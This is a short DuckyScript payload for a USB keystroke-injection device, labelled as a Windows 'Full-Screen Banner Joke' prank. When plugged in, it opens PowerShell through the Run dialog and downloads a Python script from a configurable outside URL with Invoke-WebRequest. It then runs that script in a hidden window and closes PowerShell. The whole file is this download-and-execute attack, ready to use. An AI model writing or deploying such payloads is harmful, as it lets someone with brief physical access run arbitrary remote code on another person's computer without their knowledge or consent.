REM ############################################
REM #                                          |
REM # Title        : Full-Screen Banner Joke   |
REM # Author       : Aleff                     |
REM # Version      : 1.0                       |
REM # Category     : Prank                     |
REM # Target       : Windows 10-11             |
REM #                                          |
REM ############################################


REM Requirements:
REM     - Internet Connection
REM     - Python installed
REM     - ExecutionPolicy Bypass


REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com

DEFAULT_DELAY 500
GUI r
STRINGLN powershell

STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"

STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4
